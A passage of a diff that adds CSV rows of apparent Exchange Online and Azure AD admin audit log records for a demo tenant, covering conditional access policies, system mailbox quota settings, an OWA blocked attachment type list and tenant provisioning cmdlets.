+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/22/2020 3:12:40 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-22T03:12:40Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/22/2020 3:12:40 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-22T03:12:40Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/22/2020 3:12:40 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-22T03:12:39Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/22/2020 3:12:39 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-22T03:12:39Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/22/2020 3:12:38 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-23T21:44:42Z,,,Set-ExchangeAssistanceConfig,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""PrivacyStatementURL"",
+    ""Value"": ""http://go.microsoft.com/fwlink/?LinkID=259417""
+  },
+  {
+    ""Name"": ""PrivacyLinkDisplayEnabled"",
+    ""Value"": ""True""
+  }
+]"
+2020-04-23T21:44:39Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}""
+  }
+]"
+2020-04-23T21:44:10Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:44:04Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:44:03Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:52Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:51Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:45Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:37Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}""
+  },
+  {
+    ""Name"": ""ShardRelevancyFeatureStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Microsoft Exchange""
+  }
+]"
+2020-04-23T21:43:32Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""10 GB (10,737,418,240 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""Management"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Microsoft Exchange Migration""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""9 GB (9,663,676,416 bytes)""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Migration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""10 GB (10,737,418,240 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  }
+]"
+2020-04-23T21:43:17Z,,,Set-OwaMailboxPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\OwaMailboxPolicy-Default""
+  },
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""BlockedFileTypes"",
+    ""Value"": "".settingcontent-ms;.printerexport;.appcontent-ms;.appref-ms;.vsmacros;.website;.msh2xml;.msh1xml;.diagcab;.webpnp;.ps2xml;.ps1xml;.mshxml;.gadget;.theme;.psdm1;.mhtml;.cdxml;.xbap;.vhdx;.pyzw;.pssc;.psd1;.psc2;.psc1;.msh2;.msh1;.jnlp;.aspx;.appx;.xnk;.xll;.wsh;.wsf;.wsc;.wsb;.vsw;.vst;.vss;.vhd;.vbs;.vbp;.vbe;.url;.udl;.tmp;.shs;.shb;.sct;.scr;.scf;.reg;.pyz;.pyw;.pyo;.pyc;.pst;.ps2;.ps1;.prg;.prf;.plg;.pif;.pcd;.ops;.msu;.mst;.msp;.msi;.msh;.msc;.mht;.mdz;.mdw;.mdt;.mde;.mdb;.mda;.mcf;.maw;.mav;.mau;.mat;.mas;.mar;.maq;.mam;.mag;.maf;.mad;.lnk;.ksh;.jse;.jar;.its;.isp;.ins;.inf;.htc;.hta;.hpj;.hlp;.grp;.fxp;.exe;.der;.csh;.crt;.cpl;.com;.cnt;.cmd;.chm;.cer;.bat;.bas;.asx;.asp;.app;.apk;.adp;.ade;.ws;.vb;.py;.pl;.js""
+  }
+]"
+2020-04-23T21:43:11Z,,,Install-DataClassificationConfig,"[
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  }
+]"
+2020-04-23T21:42:50Z,,,New-ExchangeAssistanceConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""IgnoreDehydratedFlag"",
+    ""Value"": ""True""
+  }
+]"
+2020-04-23T21:42:48Z,,,Enable-AddressListPaging,"[
+  {
+    ""Name"": ""DoNotUpdateRecipients"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-04-23T21:44:45Z,,,Set-TenantObjectVersion,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-04-23T21:44:42Z,,,Set-RecipientEnforcementProvisioningPolicy,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""IgnoreDehydratedFlag"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\Recipient Quota Policy""
+  },
+  {
+    ""Name"": ""PublicFolderHierarchyMailboxCountQuota"",
+    ""Value"": ""100""
+  }
+]"
+2020-04-23T21:44:11Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:44:10Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:59Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T21:43:57Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
